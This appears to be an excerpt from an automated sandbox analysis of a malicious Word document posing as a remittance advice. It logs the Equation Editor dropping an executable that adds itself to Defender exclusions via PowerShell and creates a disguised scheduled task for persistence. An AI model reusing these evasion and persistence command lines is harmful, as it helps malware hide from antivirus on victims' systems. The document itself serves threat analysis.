Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......E.........................s....................$.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H................E.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H................F.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H...............*F.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H...............>F.........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H...............MF.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....0.......H...............`F.........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....0.......H...............lF.........................s............................................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.R.:. ............................?......................................................................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ..).............................E.R.R.O.(.P..............................?........................................).....j.......x...............

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr	Binary or memory string: UPDATE [patient] SET [patientId] = @patientId, [firstName] = @firstName, [lastName] = @lastName, [mobileNumber] = @mobileNumber, [email] = @email, [userName] = @userName, [password] = @password WHERE (([patientId] = @Original_patientId) AND ([firstName] = @Original_firstName) AND ([lastName] = @Original_lastName) AND ((@IsNull_mobileNumber = 1 AND [mobileNumber] IS NULL) OR ([mobileNumber] = @Original_mobileNumber)) AND ([email] = @Original_email) AND ([userName] = @Original_userName) AND ([password] = @Original_password));
Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr	Binary or memory string: UPDATE [patient] SET [userName] = @userName, [password] = @password, [patientId] = @patientId WHERE (([userName] = @Original_userName) AND ([password] = @Original_password) AND ([patientId] = @Original_patientId));
Source: sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr	Binary or memory string: INSERT INTO [patient] ([patientId], [firstName], [lastName], [mobileNumber], [email], [userName], [password]) VALUES (@patientId, @firstName, @lastName, @mobileNumber, @email, @userName, @password);

Source: SCB REmittance Advice.doc

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp"
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {E2BA91ED-D885-4B20-9033-3784D17E4A5D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Process created: C:\Users\user\AppData\Roaming\sharon38892.exe "C:\Users\user\AppData\Roaming\sharon38892.exe"	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp"
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Process created: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: ucrtbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\taskeng.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Section loaded: wow64win.dll
